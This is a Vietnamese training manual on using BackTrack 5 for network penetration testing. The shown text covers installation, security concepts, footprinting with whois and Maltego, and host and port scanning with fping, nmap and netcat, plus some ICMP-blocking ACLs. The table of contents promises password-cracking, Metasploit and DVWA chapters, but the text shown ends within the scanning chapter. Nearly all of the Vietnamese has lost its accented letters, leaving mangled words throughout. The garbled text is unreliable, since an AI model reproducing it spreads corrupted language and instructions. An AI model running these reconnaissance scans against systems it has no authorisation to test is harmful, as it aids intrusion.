Athena-Su Dung BackTrack 5 de Khai Thac Lo Hong Mang PDF

1
TI LIU HNG DN V S DNG

BACKTRACK 5 KHAI THC L HNG
MNG TI TRUNG TM ATHENA

2

LI M U
u tin, xin gi li cm n chn thnh n thy V Thng Gim c
Trung tm o to v qun tr mng an ninh mng Athena v thy L nh Nhn
nhit tnh gip hon thnh ti liu ny.
Cho gi li cm n n cc anh ch nhn vin t vn nhn vin h tr k
thut ti Trung tm o to v qun tr mng Athena h tr v to iu kin hon
thnh d n an nin mng ng thi hn c giao.
Trn trng!
Nhm thc hin
Nguyn Sn Kh
Tn Pht
Nguyn Cao Thng

3

MC LC

Chng M u : GII THIU V BACKTRACK 5 ..................................... 6
I. Gii thiu ................................................................................................. 6
II. Mc ch .................................................................................................. 6
III. Ngun ti Backtrack : .............................................................................. 7
IV. Ci t ...................................................................................................... 8
1. Live DVD ............................................................................................. 8
2. Install .................................................................................................... 8
Chng 1: TM HIU VN BO MT MNG LAN ............................ 16
I. Gii thiu ............................................................................................... 16
II. Vn bo mt h thng v mng ......................................................... 16
1. Cc vn d chung v bo mt h thng v mng ............................... 16
2. Mt s khi nim v lch s bo mt h thng ................................... 16
3. Cc loi l hng bo mt v phng thc tn cng mng ch yu ... 17
Chng 2: FOOTPRINTING ........................................................................... 21
I. Gii thiu v Footprinting ..................................................................... 21
II. Cc bc thc hin Footprinting ........................................................... 21
1. Xc nh vng hot ng ca chng ta .............................................. 21
2. Cc thng tin c sn cng khai ........................................................... 21
3. Whois v DNS Enumeration .............................................................. 21
4. Thm d DNS ..................................................................................... 22
5. Thm d mng .................................................................................... 22
III. Phng php thc hin Footprinting ..................................................... 22
IV. Cc cng c thc hin Footprinting: ..................................................... 25
1. Sam Spade .......................................................................................... 25
2. Super Email Spider ............................................................................. 26
3. VitualRoute Trace .............................................................................. 27
4. Maltego ............................................................................................... 27
Chng 3: SCANNING ................................................................................... 28

4

I. Gii thiu ............................................................................................... 28
II. Chng nng ............................................................................................ 28
1. Xc nh h thng c ang hot ng hay khng? ............................ 28
2. Xc nh cc dch v ang chy hoc ang lng nghe. ...................... 31
3. Xc nh h iu hnh ........................................................................ 37
Chng 4: ENUMERATION .......................................................................... 39
I. Enumeration l g? ................................................................................. 39
II. Banner Grabbing .................................................................................... 39
III. Enumerating cc dch v mng .............................................................. 39
1. Http fingerprinting .............................................................................. 39
2. DNS Enumeration .............................................................................. 42
3. Netbios name ...................................................................................... 44
Chng 5: PASSWORD CRACKING ............................................................ 45
I. Gii Thiu .............................................................................................. 45
II. Cc K Thut Password Cracking ......................................................... 45
1. Dictionary Attacks/Hybrid Attacks .................................................... 45
2. Brute Forcing Attacks ........................................................................ 45
3. Syllable Attacks/Pre-Computed Hashes ............................................. 45
III. Cc Kiu Tn Cng Thng Gp .......................................................... 45
1. Active Password Cracking ................................................................. 45
2. Passive Password Cracking ................................................................ 46
3. Offline Password Cracking ................................................................ 46
IV. Cc cng c Password Cracking ............................................................ 46
1. Hydra .................................................................................................. 46
2. Medusa ............................................................................................... 48
V. Password Cracking Trn Cc Giao Thc .............................................. 51
1. HTTP (HyperText Tranfer Protocol) ................................................. 51
2. SSH (Secure Shell) ............................................................................. 58
3. SMB (Server Message Block) ............................................................ 61
4. RDP (Remote Desktop Protocol) ....................................................... 64

5

Chng 6: SYSTEM HACKING .................................................................... 67
I. GII THIU V METASPLOIT .......................................................... 67
1. Gii thiu ............................................................................................ 67
2. Cc thnh phn ca Metasploit .......................................................... 67
3. S dng Metasploit Framework ......................................................... 67
4. Gii thiu Payload Meterpreter .......................................................... 68
5. Cch phng chng .............................................................................. 70
II. Li MS10-046 (2286198) ...................................................................... 70
1. Gii thiu ............................................................................................ 70
2. Cc bc tn cng: ............................................................................. 71
3. Cch phng chng .............................................................................. 79
III. Li BYPASSUAC ................................................................................. 80
1. Gii thiu ............................................................................................ 80
2. Cc bc tn cng .............................................................................. 80
3. Cch phng chng .............................................................................. 85
Chng 7: WEB HACKING VI DVWA ...................................................... 86
I. Gii thiu ............................................................................................... 86
II. Hng dn ci t DVWA trn Backtrack ............................................ 86
1. Ti v ci t XAMPP ........................................................................ 86
2. Ti v ci t DVWA ......................................................................... 88
III. Cc k thut tn cng trn DVWA ......................................................... 92
1. XSS (Cross-Site Scripting) ................................................................. 92
2. SQL Injection ................................................................................... 100
TI LIU THAM KHO ................................................................................ 106

6

Chng M u : GII THIU V BACKTRACK 5
I. Gii thiu

Backtrack l mt bn phn phi dng Live DVD ca Linux, c pht trin th
nghim thm nhp. Trong cc nh dng Live DVD, chng ta s dng c th
Backtrack trc tip t a DVD m khng cn ci n vo my ca chng ta. Backtrack
cng c th c ci t vo cng v s dng nh mt h iu hnh. Backtrack l s
hp nht gia 3 bn phn phi khc nhau ca Linux v thm nhp th nghim -
IWHAX, WHOPPIX, v Auditor. Trong phin bn hin ti ca n (5), Backtrack c
da trn phin bn phn phi Linux Ubuntu 11.10. Tnh n ngy 19 thng by nm
2010, Backtrack 5 c ti v ca hn 1,5 triu ngi s dng. Phin bn mi nht
l Backtrack 5 R2
II. Mc ch
Cng c Backtrack c lch s pht trin kh lu qua nhiu bn linux khc
nhau. Phin bn hin nay s dng bn phn phi Slackware linux (Tomas M.
(www.slax.org)). Backtrack lin tc cp nht cc cng c, drivers,... hin ti Backtrack
c trn 300 cng c phc v cho vic nghin cu bo mt. Backtrack l s kt hp
gia 2 b cng c kim th bo mt rt ni ting l Whax v Auditor.
Backtrack 5 cha mt s cng c c th c s dng trong qu trnh th
nghim thm nhp ca chng ta. Cc cng c kim tra thm nhp trong Backtrack 5,0
c th c phn loi nh sau:
Information gathering: loi ny c cha mt s cng c c th c s
dng c c thng tin lin quan n mt mc tiu DNS, nh tuyn, a
ch e-mail, trang web, my ch mail, v nh vy. Thng tin ny c thu
thp t cc thng tin c sn trn Internet, m khng cn chm vo mi
trng mc tiu.
Network mapping: loi ny cha cc cng c c th c s dng kim
tra cc host ang tn ti, thng tin v OS, ng dng c s dng bi mc
tiu, v cng lm portscanning.
Vulnerability identification: Trong th loi ny, chng ta c th tm thy cc
cng c qut cc l hng (tng hp) v trong cc thit b Cisco. N cng
cha cc cng c thc hin v phn tch Server Message Block (SMB) v
Simple Network Management Protocol (SNMP).
Web application analysis: loi ny cha cc cng c c th c s dng
trong theo di, gim st cc ng dng web

7

Radio network analysis: kim tra mng khng dy, bluetooth v nhn
dng tn s v tuyn (RFID), chng ta c th s dng cc cng c trong th
loi ny.
Penetration: loi ny cha cc cng c c th c s dng khai thc cc
l hng tm thy trong cc my tnh mc tiu
Privilege escalation: Sau khi khai thc cc l hng v c truy cp vo cc
my tnh mc tiu, chng ta c th s dng cc cng c trong loi ny
nng cao c quyn ca chng ta cho cc c quyn cao nht.
Maintaining access: Cng c trong loi ny s c th gip chng ta trong
vic duy tr quyn truy cp vo cc my tnh mc tiu. Chng ta c th cn
c c nhng c quyn cao nht trc khi cc chng ta c th ci t
cng c duy tr quyn truy cp
Voice Over IP (VOIP): phn tch VOIP chng ta c th s dng cc cng
c trong th loi ny
Digital forensics: Trong loi ny, chng ta c th tm thy mt s cng c c
th c s dng lm phn tch k thut nh c c hnh nh a cng,
cu trc cc tp tin, v phn tch hnh nh a cng. s dng cc cng c
cung cp trong th loi ny, chng ta c th chn Start Backtrack Forensics
trong trnh n khi ng. i khi s i hi chng ta phi gn kt ni b a
cng v cc tp tin trao i trong ch ch c bo tn tnh ton vn.
Reverse engineering: Th loi ny cha cc cng c c th c s dng
g ri chng trnh mt hoc tho ri mt tp tin thc thi.
III. Ngun ti Backtrack :

Chng ta c th ti bn Backtrack 5 ti a ch: www.backtrack-linux.org/downloads/
C bn cho Vmware v file ISO

8

IV. Ci t
1. Live DVD
Nu chng ta mun s dng Backtrack m khng cn ci n vo cng, chng
ta c th ghi tp tin nh ISO vo a DVD, v khi ng my tnh ca chng ta vi
DVD. Backtrack sau s chy t a DVD. Li th ca vic s dng Backtrack l
mt DVD Live l n l rt d dng lm v chng ta khng cn phi gy ri vi cu
hnh my hin ti ca chng ta.
Tuy nhin, phng php ny cng c mt s nhc im. Backtrack c th
khng lm vic vi phn cng, v thay i cu hnh no c thc hin trn phn
cng lm vic s khng c lu vi a DVD Live. Ngoi ra, n l chm, v my
tnh cn phi ti cc chng trnh t a DVD.
2. Install
a) Ci t trong my tht:
Chng ta cn chun b mt phn vng ci t Backtrack. Sau chy
Backtrack Live DVD. Khi gp mn hnh login
Ta s dng username l root, pass l toor. Sau vo ch ha, ta g
startx v ta s vo ch ha ca Backtrack 5.
ci t Backtrack 5 n a cng ta chn tp tin c tn install.sh trn desktop
v tin hnh ci t. Tuy nhin, nu khng th tm thy tp tin, chng ta c th s dng
ubiquity ci t. s dng ubiquity, ta m Terminal g ubiquity.

9

Sau ca s ci t s hin th. Sau tr li 1 s cu hi nh thnh ph chng ta
ang sng, keyboard layout, phn vng a ci t, Sau tin hnh ci t.
b) Ci t trong my o:
im thun li l ta khng cn chun b mt phn vng cho Backtrack, v s
dng ng thi mt OS khc. Khuyt im l tc chm, khng dng c wireless
tr USB wireless.
Ta c th c th s dng file VMWare c cung cp bi BackTrack. T y
chng ta c BackTrack trn my o tht d dng v nhanh chng. Cu hnh trong file
VMWare l memory 768MB, hardisk :30GB, Network:NAT. s dng c card
mng tht, ta phi chn Netword l Briged
Di y lm mt s hnh nh khi ci BackTrack trn my o VMWare

To mt my o mi v cho ia BackTrack vo.

10

Giao din khi ng ca BackTrack

11

G startx vo ch ha trong BackTrack

ci t, click chn vo file Install BackTrack trn mn hnh Desktop

12

Chn ngn ng, chn Forward tip tc

Chn ni ca chng ta, chn Forward tip tc

13

Chn ngn ng bn phm, chn Forward tip tc

Chn phn vng ci.

14

Nhn Install bt u ci

Qu trnh ci bt u.

15

Sau khi hon tt, ch vic khi ng li l xong.

16

Chng 1: TM HIU VN BO MT MNG LAN
I. Gii thiu
An ninh an ton mng my tnh hon ton l vn con ngi, do vic a
ra mthnh lang php l v cc quy nguyn tc lm vic c th l cn thit. y,
hnhlang php l c th gm: cc iu khon trong b lut ca nh nc, cc vn
bndi lut,... Cn cc quy nh c th do tng t chc t ra cho ph hp vi
tngc im ring. Cc quy nh c th nh: quy nh v nhn s, vic s dng
my,s dng phn mm,... V nh vy, s hiu qu nht trong vic m bo an ninh
anton cho h thng mng my tnh mt khi ta thc hin trit gii php v
chnhsch con ngi.Tm li, vn an ninh an ton mng my tnh l mt vn
ln, n yucu cn phi c mt gii php tng th, khng ch phn mm, phn cng
my tnhm n i hi c vn chnh sch v con ngi. V vn ny cn phi
cthc hin mt cch thng xuyn lin tc, khng bao gi trit c v n
lunny sinh theo thi gian. Tuy nhin, bng cc gii php tng th hp l, c bit
lgii quyt tt vn chnh sch v con ngi ta c th to ra cho mnh s an
tonchc chn hn.
II. Vn bo mt h thng v mng
1. Cc vn d chung v bo mt h thng v mng
c im chung ca mt h thng mng l c nhiu ngi s dng chung
v phn tn v mt a l nn vic bo v ti nguyn (mt mt hoc s dng khng
hp l) phc tp hn nhiu so vi vic mi trng mt my tnh n l, hoc
mtngi s dng.Hot ng ca ngi qun tr h thng mng phi m bo cc
thng tin trnmng l tin cy v s dng ng mc ch, i tng ng thi m bo
mng hotng n nh khng b tn cng bi nhng k ph hoi. Nhng trn thc t
l khng mt mng no m bo l an ton tuyt i, mth thng d c bo v
chc chn n mc no th cng c lc b v hiu ha binhng k c xu.
2. Mt s khi nim v lch s bo mt h thng
a) i tng tn cng mng (intruder)
i tng l nhng c nhn hoc t chc s dng nhng kin thc v
mngv cc cng c ph hoi (gm phn cng hoc phn mm) d tm cc im
yuv cc l hng bo mt trn h thng, thc hin cc hot ng xm nhp v
chimot ti nguyn tri php.Mt s i tng tn cng mng nh:Hacker: l nhng
k xm nhp vo mng tri php bng cch s dng cccng c ph mt khu hoc
khai thc cc im yu ca thnh phn truy nhp trn hthngMasquerader : L nhng

17

k gi mo thng tin trn mng nh gi mo a chIP, tn min, nh danh ngi
dngEavesdropping: L nhng i tng nghe trm thng tin trn mng, s
dngcc cng c Sniffer, sau dng cc cng c phn tch v debug ly c
ccthng tin c gi tr. Nhng i tng tn cng mng c th nhm nhiu mc ch
khc nhau nhn cp cc thng tin c gi tr v kinh t, ph hoi h thng mng c ch
nh, hocc th l nhng hnh ng v thc
b) Cc l hng bo mt
Cc l hng bo mt l nhng im yu trn h thng hoc n cha
trongmt dch v m da vo k tn cng c th xm nhp tri php vo h thng
thc hin nhng hnh ng ph hoi chim ot ti nguyn bt hp php.C nhiu
nguyn nhn gy ra nhng l hng bo mt: c th do li ca bnthn h thng, hoc
phn mm cung cp hoc ngi qun tr yu km khng hiusu v cc dch v cung
cpMc nh hng ca cc l hng ti h thng l khc nhau. C l hngch nh
hng ti cht lng dch v cung cp, c l hng nh hng ti ton b hthng hoc
ph hy h thng
c) Chnh sch bo mt
Chnh sch bo mt l tp hp cc quy tc p dng cho nhng ngi
thamgia qun tr mng, c s dng cc ti nguyn v cc dch v mng.
i vi tng trng hp phi c chnh sch bo mt khc nhau. Chnh
sch bo mt gip ngi s dng bit trch nhim ca mnh trong vic
bo v cc tinguyn trn mng, ng thi cn gip cho nh qun tr mng thit lp
cc bin phpm bo hu hiu trong qu trnh trang b, cu hnh v kim sot hot
ng ca hthng v mng.
3. Cc loi l hng bo mt v phng thc tn cng mng ch yu
a) Cc loi l hng
C nhiu cc t chc tin hnh phn loi cc dng l hng c bit.
Theo b quc phng M cc loi l hng c phn lm ba loi nh sau:
L hng loi C
Cho php thc hin cc hnh thc tn cng theo DoS(Denial of Services- T
chi dch v) Mc nguy him thp ch nh hng ticht lng dch v, lm ngng
tr, gin on h thng, khng lm ph hng d liuhoc t c quyn truy cp bt
hp php.DoS l hnh thc tn cng s dng cc giao thc tng Internet trong bgiao
thc TCP/IP lm h thng ngng tr dn n tnh trng t chi ngi sdng hp
php truy nhp hay s dng h thng.Cc dch v c l hng cho php cc cuc tn
cng DoS c th c nngcp hoc sa cha bng cc phin bn mi hn ca cc nh

18

cung cp dch v. Hinnay cha c mt bin php hu hiu no khc phc tnh
trng tn cng kiu nyv bn thn thit k tng Internet (IP) ni ring v b giao
thc TCP/IP ni chung n cha nhng nguy c tim tang ca cc l hng loi ny.
L hng loi B:
Cho php ngi s dng c thm cc quyn trn h thng m khng cn kim
tra tnh hp l dn n mt mt thng tin yu cu cn bo mt.L hng ny thng c
trong cc ng dng trn h thng . C mc nguy him l trung bnh.L hng loi B
ny c mc nguy him hn l hng loi C. Cho phpngi s dng ni b c th
chim c quyn cao hn hoc truy nhpkhnghp php.
Nhng l hng loi ny thng xut hin trong cc dch v trn h thng. Ng
s dng local c hiu l ngi c quyn truy nhp vo h thng vimt s quyn
hn nht nh. Tm hiu vn bo mt mng LAN. Mt dng khc ca l hng loi B
xy ra vi cc chng trnh vit bng m ngun C. Nhng chng trnh vit bng m
ngun C thng s dng mt vngm, mt vng trong b nh s dng lu tr d
liu trc khi x l. Ngi lptrnh thng s dng vng m trong b nh trc khi
gn mt khong khng gian b nh cho tng khi d liu. V d khi vit chng trnh
nhp trng tn ngi sdng quy nh trng ny di 20 k t bng khai bo:Char
first_name [20]; Khai bo ny cho php ngi s dng nhp ti a 20k t. Khi nhp
d liu ban u d liu c lu vng m. Khi ngi s dngnhp nhiu hn 20 k
t s trn vng m. Nhng k t nhp tha s nm ngoivng m khin ta khng th
kim sot c. Nhng i vi nhng k tn cngchng c th li dng nhng l hng
ny nhp vo nhng k t c bit thcthi mt s lnh c bit trn h thng.
Thng thng nhng l hng ny c lidng bi nhng ngi s dng trn h
thng t c quyn root khng hp l. hn ch c cc l hng loi B phi
kim sot cht ch cu hnh h thng vcc chng trnh.
L hng loi A
Cho php ngi ngoi h thng c th truy cp bt hp phpvo h thng. C
th lm ph hu ton b h thng. Loi l hng ny c mc rtnguy him e da
tnh ton vn v bo mt ca h thng. Cc l hng ny thngxut hin nhng h
thng qun tr yu km hoc khng kim sot c cu hnhmng. Nhng l hng loi
ny ht sc nguy him v n tn ti sn c trn phnmm s dng, ngi qun tr
nu khng hiu su v dch v v phn mm s dngc th b qua im yu ny. V
vy thng xuyn phi kim tra cc thng bo cacc nhm tin v bo mt trn mng
pht hin nhng l hng loi ny. Mt lotcc chng trnh phin bn c thng s
dng c nhng l hng loi A nh: FTP,Gopher, Telnet, Sendmail, ARP, finger.

19

b) Cc hnh thc tn cng mng ph bin
Scanner
Scanner l mt chng trnh t ng r sot v pht hin nhng im yu v
bo mt trn mt trm lm vic cc b hoc mt trm xa. Mt k ph hoi s dng
chng trnh Scanner c th pht hin ra nhng l hng v bo mt trn mtServer d
xa.C ch hot ng l r sot v pht hin nhng cng TCP/UDP c s dng trn
h thng cn tn cng v cc dch v s dng trn h thng . Scanner ghi li nhng
p ng trn h thng t xa tng ng vi dch v m n pht hinra. T n c th
tm ra im yu ca h thng. Nhng yu t mt Scanner hot ng nh sau:Yu
cu thit b v h thng: Mi trng c h tr TCP/IPH thng phi kt ni vo mng
Internet.Cc chng trnh Scanner c vai tr quan trng trong mt h thng bo mt,v
chng c kh nng pht hin ra nhng im yu km trn mt h thng mng.
Password Cracker
L mt chng trnh c kh nng gii m mt mt khu c m hohoc c
th v hiu ho chc nng bo v mt khu ca mt h thng.Mt s chng trnh ph
kho c nguyn tc hot ng khc nhau. Mt schng trnh to ra danh sch cc t
gii hn, p dng mt s thut ton m ho t kt qu so snh vi Password m ho
cn b kho to ra mt danh sch khctheo mt logic ca chng trnh.Khi thy
ph hp vi mt khu m ho, k ph hoi c c mt khudi dng text .
Mt khu text thng thng s c ghi vo mt file.Bin php khc phc i vi
cch thc ph hoi ny l cn xy dng mtchnh sch bo v mt khu ng n.
Sniffer
Sniffer l cc cng c (phn cng hoc phn mm)bt cc thng tin
luchuyn trn mng v ly cc thng tin c gi tr trao i trn mng.Sniffer c th
bt c cc thng tin trao i gia nhiu trm lm vic vinhau. Thc hin bt cc
gi tin t tng IP tr xung. Giao thc tng IP c nhngha cng khai, v cu trc
cc trng header r rng, nn vic gii m cc gi tin ny khng kh khn.
Mc ch ca cc chng trnh sniffer l thit lp ch promiscuous(mode
dng chung) trn cc card mng ethernet - ni cc gi tin trao i trongmng - t
"bt" c thng tin.Cc thit b sniffer c th bt c ton b thng tin trao i trn
mng lda vo nguyn tc broadcast (qung b) cc gi tin trong mng Ethernet.Tuy
nhin vic thit lp mt h thng sniffer khng phi n gin v cn phi xm nhp
c vo h thng mng v ci t cc phn mm sniffer.ng thi cc chng
trnh sniffer cng yu cu ngi s dng phi hiusu v kin trc, cc giao thc
mng.Vic pht hin h thng b sniffer khng phi n gin, v sniffer hot ng
tng rt thp, v khng nh hng ti cc ng dng cng nh cc dch v hthng

20

cung cp.Tuy nhin vic xy dng cc bin php hn ch sniffer cng khng qu
khkhn nu ta tun th cc nguyn tc v bo mt nh:
Khng cho ngi l truy nhp vo cc thit b trn h thng
Qun l cu hnh h thng cht ch
Thit lp cc kt ni c tnh bo mt cao thng qua cc c ch m ho.
Trojans
Trojans l mt chng trnh chy khng hp l trn mt h thng. Vi vaitr
nh mt chng trnh hp php. Trojans ny c th chy c l do cc chngtrnh
hp php b thay i m ca n thnh m bt hp php.V d nh cc chng trnh
virus l loi in hnh ca Trojans. Nhngchng trnh virus thng che du cc on
m trong cc chng trnh s dng hp php. Khi nhng chng trnh ny c kch
hot th nhng on m n du sthc thi v chng thc hin mt s chc nng m
ngi s dng khng bit nh: ncp mt khu hoc copy file m ngi s dng nh
ta thng khng hay bit.Mt chng trnh Trojans s thc hin mt trong nhng cng
vic sau:
Thc hin mt vi chc nng hoc gip ngi lp trnh ln n pht hinnhng
thng tin quan trng hoc nhng thng tin c nhn trn mt h thng hocch trn mt
vi thnh phn ca h thng .
Che du mt vi chc nng hoc l gip ngi lp trnh pht hin nhngthng
tin quan trng hoc nhng thng tin c nhn trn mt h thng hoc ch trnmt vi
thnh phn ca h thng. Ngoi ra cn c cc chng trnh Trojan c th thc hin
c c hai chc nngny. C chng trnh Trojan cn c th ph hy h thng bng
cch ph hoi ccthng tin trn cng. Nhng ngy nay cc Trojans kiu ny d dng
b pht hin vkh pht huy c tc dng.Tuy nhin c nhng trng hp nghim
trng hn nhng k tn cng to ranhng l hng bo mt thng qua Trojans v k tn
cng ly c quyn root trnh thng v li dng quyn ph hy mt phn
hoc ton b h thng hocdng quyn root thay i logfile, ci t cc chng
trnh trojans khc m ngiqun tr khng th pht hin c gy ra mc nh
hng rt nghim trng vngi qun tr ch cn cch ci t li ton b h thng.

21

Chng 2: FOOTPRINTING

I. Gii thiu v Footprinting
L mt k thut tm kim thng tin v mt danh nghip, c nhn hay t
chc.
Mt trong 3 giai on cn phi lm thc hin mt cuc tn cng.
Mt k tn cng dnh 90% thc hin vic thu thp v tim kim
thng tin v 10% thc hin tn cng.
Kt qu ca qu trnh Footprinting l ly c thng tin c bn ca mc
tiu tn cng: Tn, a ch cng ty, website, cc thnh vin trong cng ty,
s mng,
Cc thng tin cn tm kim:
Internet: Domain, Network blocks, IP, TCP hay UDP, System
Enumeration, ACLs, IDSes,
Intranet
Remote access: Remote system type,
Extranet: Connection origination and destination,
II. Cc bc thc hin Footprinting
Bao gm cc bc sau:
1. Xc nh vng hot ng ca chng ta
Th u tin trong kinh doanh l xc nh vng hot ng ca cc hot ng
footprinting ca chng ta. N c th l mt nhim v nn lng xc nh tt c cc
thc th trong mt t chc no . Tuy nhin, hacker chng thng cm cho cuc chin
ca chng ta. H khai thc cc im yu trong bt c cc biu mu no. Chng ta
khng mun hacker bit nhiu v tnh trng bo mt ca chng ta.
2. Cc thng tin c sn cng khai
Lng thng tin m n sn sng sn c cho chng ta, t chc chng ta v bt c
nhng g chng ta c th hnh dung th chng l g thiu tnh tuyt vi.
Nhng thng tin c th bao gm: trang web ca cng ty; cc t chc quan h; v
tr ta lc; thng tin chi tit v nhn vin; cc s kin hin ti; cc chnh sch bo mt
v s ring t.
3. Whois v DNS Enumeration
Xem chi tit thng tin v a ch IP, name server, dns server

22

4. Thm d DNS
Sau khi xc nh tt c cc domain c lin quan, chng ta bt u truy vn
DNS. DNS l mt c s d liu phn tn dng nh x cc a ch IP thnh
hostname. Nu DNS khng c cu hnh mt cch bo mt, rt c kh nng ly c
cc thng tin bi l t t chc.
5. Thm d mng
By gi th chng ta xc nh c cc mng tim nng, chng ta c th xc
nh m hnh mng cng nh ng truy cp c kh nng vo mng

III. Phng php thc hin Footprinting
C 2 phng php thc Footprinting:
Active Footprinting: lin h trc tip vi mc tiu, tm hiu thng tin
cn thit
Passive Footprinting: Tm kim thng qua cc bi bo, trang web,
hoc t cc i th mc tiu,
Website: www.google.com ,
http://whois.domaintools.comwww.whois.net , www.tenmien.vn ,
www.arcchive.org ,

23

Whois : athena.com.vn

24

Tenmien.vn

25

Archive: http://www.microsoft.com

IV. Cc cng c thc hin Footprinting:
Sam Spade, Super email spider, VitualRoute Trace, Google Earth, Whois, Site
Digger, Maltego,
1. Sam Spade
Cho php ngi s dng c th thc hin cc hnh ng: Ping, Nslookup,
Whois, Traceroute,

26

2. Super Email Spider
Tm kim thng tin v a ch email ca c quan t chc s dng Search
Engine: Google, Lycos, iWon, Exiter, Hotbot, MSN, AOL,

27

3. VitualRoute Trace
Hin th cc ng ni kt, a ch, khu vc ng kt ni i qua.

4. Maltego
L cng c dng pht hin cc lin kt gia: Ngi s dng, c quan, t
chc, website, domain, di mng, a ch IP,

28

Chng 3: SCANNING
I. Gii thiu
Nu footprinting l vic xc nh ngun thng tin ang u th scanning l
vic tm ra tt c cc cnh ca xm nhp vo ngun thng tin . Trong qu trnh
footprinting, chng ta t c danh sch dy mng IP v a ch IP thng qua
nhiu k thut khc nhau bao gm whois v truy vn ARIN. K thut ny cung cp
cho nh qun tr bo mt cng nh hacker nhiu thng tin co gi tr v mng ch, dy
IP, DNS servers v mail servers. Trong chng ny, chng ta s xc nh xem h
thng no ang lng nghe trn giao thng mng v c th bt c qua vic s dng
nhiu cng c v k thut nh ping sweeps, port scan. Chng ta c th d dng vt
tng la bng tay (bypass firewalls) scan cc h thng gi s nh n ang b kha
bi chnh sch trch lc (filtering rules).
II. Chng nng
1. Xc nh h thng c ang hot ng hay khng?
Mt trong nhng bc c bn lp ra mt mng no l ping sweep trn mt
dy mng v IP xc nh cc thit b hoc h thng c ang hot ng hay khng.
Ping thng c dng gi cc gi tin ICMP ECHO ti h thng ch v c gng
nhn c mt ICMP ECHO REPLY bit h thng ang hot ng. Ping c th
c chp nhn xc nh s lng h thng cn sng c trong mng trong mng
va v nh ( Lp C c 254 v B c 65534 a ch) v chng ta c th mt hng gi,
hng ngy hon thnh cho nhnh mng lp A 16277214 a ch.
a) Netword Ping Sweeps
Netword pinging l hnh ng gi cc loi ca giao thng mng ti ch v
phn tch kt qu. Pinging s dng ICMP (Internet Control Message Protocol). Ngoi
ra, n cn s dng TCP hoc UDP tm host cn sng.
thc hin ICMP ping sweep, ta c th s dng fping, nmap,.
Fping a g 192.168.10.1 192.168.10.10
-a hin thi host ang sng: alive
-g dy a ch: 192.168.10.0/24 or nh trn

29

Nmap sP PE 192.168.10.0/24
-sP: ping scan
-PE: ping echo

30

Phng chng: chng ta c th dng pingd gi tt c cc giao thng mng
ICMP ECHO v ICMP ECHO REPLY cp host. im ny t
c bng cch g b s h tr ca vic x l ICMP ECHO t nhn h
thng. V mt c bn, n cung cp mt c ch iu khin truy cp mc
h thng.
b) ICMP query
Ping sweeps (or ICMP ECHO packets) c th ni ch l nh u ca tng
bng khi ni n thng tin ICMP v mt h thng. chng ta c th thu thp nhiu loi
thng tin c gi tr n gin bng cch cc gi tin ICMP. Chng ta c th yu cu mt
n mng ca mt thit b no vi Address Mask Request. Mt n mng rt quan
trng v chng ta c th xc nh c tt c a ch ca ch, bit c gatewate mt
nh, a ch broadcast. Nh vo gateway mc nh, chng ta c th tn cng router.
Vi a ch broadcast. Nhng khng phi tt c cc router no cng h tr Time v
Netmask.
Phng chng: Kha loi ICMP m cung cp thng tin ti router bin
(router i ra ISP). gim ti mc thiu, chng ta nn dng access list
(ACLs):
o Access-list 101 deny icmp any any 13 // yu cu timestamp
o Access-list 101 deny icmp any any 17 // yu cu address mask

31

2. Xc nh cc dch v ang chy hoc ang lng nghe.
a) Port Scanning
Port scanning l qu trnh gi cc gi tin ti cng TCP v UDP trn h
thng ch xc nh dch v no ang chy hoc trong tnh trng ang lng nghe.
Vic xc nh ang lng nghe l rt quan trng xc nh cc dch v ang chy.
Thm vo , chng ta c th xc nh loi v phin bn h iu hnh ang chy v
ng dng ang x dng.
b) Cc Loi Scan
Trc khi thc hin port scanning, chng ta nn im qua mt s cch thc
qut sn c:
TCP Connect scan: loi ny kt ni ti cng ch v thc hin y
quy trnh bt tay ba bc (SYN, SYN/ACK, ACK). Tuy nhin iu ny
th d dng b pht hin bi h thng ch. N s dng li gi h thng
thay cho cc gi tin sng (raw packets) v thng c s dng bi
nhng ngi dng Unix khng c quyn.V SYN Scan khng th thc
hin c.
TCP SYN scan: n khng to ra mt kt ni ti ngun m ch gi gi
tin SYN(bc u tin trong ba bc to kt ni) ti ch. Nu a gi tin
SYN/ACK c tr v th chng ta bit c cng ang lng nghe.
Ngc li, nu nhn c RST/ACK th cng khng lng nghe. K
thut ny kh b pht hin hn l TCP connect v n khng lu li

32

thng tin my tnh ch. Tuy nhin, mt trong nhng nhc im ca
k thut ny l c th to ra iu kin t chi dch v DoS nu c qu
nhiu kt ni khng y c to ra. V vy, k thut ny l an ton
nu khng c qu nhiu kt ni nh trn c to ra.
TCP ACK Scan: k thut ny c dng vch ra cc quy tt thit lp
tng la. n c th gip xc nh xem tng la l trnh trch lc cc
gi tin n gin cho php to kt ni hay l trnh trch lc nng cao.
Tuy nhin n khng th phn bit c cng no open hay closed.
TCP Windows Scan: Ging vi ACK Scan, im khc l n c th pht
hin cng open vi closed.
UDP Scan: k thut ny gi mt gi tin UDP ti cng ch. Nu cng
ch tr li vi thng ip ICMP port unreachable th cng closed.
Nu khng nhn c thng ip trn th cng trn ang m. Tuy
nhin, UDP scan l mt qu trnh rt chp nu nh chng ta c gng
scan mt thit b no m c p chnh sch trch lc gi tin mnh.
TCP FIN, XMAS, NULL: chng chuyn nghip trong vic ln lt vt
tng la khm ph cc h thng pha sau. Tuy nhin, chng li
ph thuc nhiu vo cch x l ca h thng ch m(in hnh l
Windows) th khng c biu hin g.
c) Xc nh cc dch v TCP v UDP ang chy
Strobe: c tin cy cao, tuy nhin ch h tr TCP, khng h tr UDP

33

Netcat l mt tin ch mng Unix n gin tnh nng c v ghi d liu
qua kt ni mng, s dng giao thc TCP / IP.N c thit k nh l
mt cng c ng tin cy "back-end" c th c s dng trc tip hoc
d dng iu khin bi cc chng trnh v cc script khc. ng thi,
n l cng c g li mng vi nhiu tnh nng v cng c thm d.
Nc v z w2 192.168.10.102 1-4000
-v: xut chi tit ra mn hnh
-z: zero-I/O mode khng gi d liu no ch pht ra mt gi tin.
192.168.10.102: host
1-4000: port cn qut.

Nmap (Network Mapper) l mt tin ch ngun m min ph cho pht
hin mng v kim ton an ninh. Nhiu qun tr mng v h thng cng
tm thy s hu ch cho cc cng vic nh kim k mng li, dch v
qun l lch trnh, v theo di thi gian hot ng dch v v my ch.
Nmap s dng cc gi tin IP th trong cc phng php mi xc nh
host no c sn trn mng, cc dch v (tn ng dng v phin bn) m
host ang cung cp, h iu hnh g (v cc phin bn h iu hnh)
m h ang chy, loi b lc gi tin hoc tng la no ang s dng,
v nhiu c im khc. N c thit k scan nhanh chng cc mng

34

ln, nhng ho. Nmap chy c trn tt c cc h iu hnh, v cc gi
nh phn chnh thc c sn cho Linux, Windows, v Mac OS X.
